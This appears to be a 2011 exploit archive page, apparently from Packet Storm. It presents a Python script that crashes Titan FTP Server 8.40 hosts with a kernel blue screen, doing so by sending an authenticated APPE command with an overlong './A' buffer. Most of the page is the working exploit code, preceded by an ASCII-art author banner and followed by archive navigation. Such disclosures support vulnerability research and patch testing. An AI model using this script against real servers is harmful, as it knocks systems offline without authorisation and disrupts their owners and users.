exploit the possibilities

Titan FTP Server 8.40 Denial Of Service

Titan FTP Server 8.40 Denial Of Service
Posted Nov 27, 2011
Authored by Houssam Sahli

Titan FTP Server version 8.40 suffers from a denial of service condition that leads to a kernel crash.

tags | exploit, denial of service, kernel
MD5 | 67145855a6ec2d806a6823307f2f936c

Titan FTP Server 8.40 Denial Of Service

Change Mirror Download
#!/usr/bin/python
#
# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash
# Date: 25/11/2011
# Author: Houssam Sahli
# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe
# Version: 8.40
# Developed by : South River Technologies, Inc.
# Tested on: Windows XP SP3 French
# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death".
# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.

print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"

print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"

import socket
import sys

def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 2000
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] wait for the crash...;)"
sock.send("APPE %s\r\n" %buffer)
sock.close()

if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Sep 1st
  1 Files
 • 2
  Sep 2nd
  38 Files
 • 3
  Sep 3rd
  30 Files
 • 4
  Sep 4th
  15 Files
 • 5
  Sep 5th
  12 Files
 • 6
  Sep 6th
  17 Files
 • 7
  Sep 7th
  3 Files
 • 8
  Sep 8th
  1 Files
 • 9
  Sep 9th
  24 Files
 • 10
  Sep 10th
  22 Files
 • 11
  Sep 11th
  22 Files
 • 12
  Sep 12th
  15 Files
 • 13
  Sep 13th
  5 Files
 • 14
  Sep 14th
  2 Files
 • 15
  Sep 15th
  1 Files
 • 16
  Sep 16th
  11 Files
 • 17
  Sep 17th
  16 Files
 • 18
  Sep 18th
  8 Files
 • 19
  Sep 19th
  12 Files
 • 20
  Sep 20th
  0 Files
 • 21
  Sep 21st
  0 Files
 • 22
  Sep 22nd
  0 Files
 • 23
  Sep 23rd
  0 Files
 • 24
  Sep 24th
  0 Files
 • 25
  Sep 25th
  0 Files
 • 26
  Sep 26th
  0 Files
 • 27
  Sep 27th
  0 Files
 • 28
  Sep 28th
  0 Files
 • 29
  Sep 29th
  0 Files
 • 30
  Sep 30th
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close